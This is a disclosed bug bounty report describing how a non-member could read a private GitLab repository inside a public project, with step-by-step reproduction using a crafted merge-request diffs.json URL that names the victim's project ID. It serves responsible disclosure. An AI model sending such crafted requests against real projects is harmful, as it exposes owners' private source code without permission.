Source Code Disclosure of Private Repo in Public/Internal Project

HackerOne report #455673 by ngalog on 2018-12-05:

Summary: One of the very unique feature of Gitlab is that it allows you to adjust the permission of each separate part of your project. Consider this setting, a public project with a private repo. Like in this screenshot

Owner of project could be secretly developing something in the repo part and but want to keep the rest of the project public.

However, there is a way to bypass this protection, and still allow non-project member to view the source code of repo.

Steps To Reproduce (Quick):

• Login and visit here to confirm you can't see the repo -- project id is 9769102
• Visit one of the project you own and visit https://gitlab.com/{project_name_space}/merge_requests/new/diffs.json, if you can see {"html":"\u003cdiv class=\"nothing-here-block\"\u003e\nThis merge request cannot be created.\n\u003c/div\u003e\n"} in response, please proceed, if not, please create at least one file in that project
• Then add this in the query part of the url ?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=9769102&merge_request%5Bsource_branch%5D=master&merge_request%5Btarget_project_id%5D=124124124&merge_request%5Btarget_branch%5D=master
• Now you are looking at the source code for my private repo in project 9769102

Slow way to reproduce:

• Create a project with config like this
• create some file inside
• login as other user, and visit https://gitlab.com/{project_namespace_that_you_own}/merge_requests/new/diffs.json?utf8=%E2%9C%93&merge_request[source_project_id]={victim_project_id}&merge_request[source_branch]=master&merge_request[target_project_id]=1294819248&merge_request[target_branch]=master
• Source code disclosure!

Impact

source code disclosure for private repo in public project

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• publicWithPrivateRepo.PNG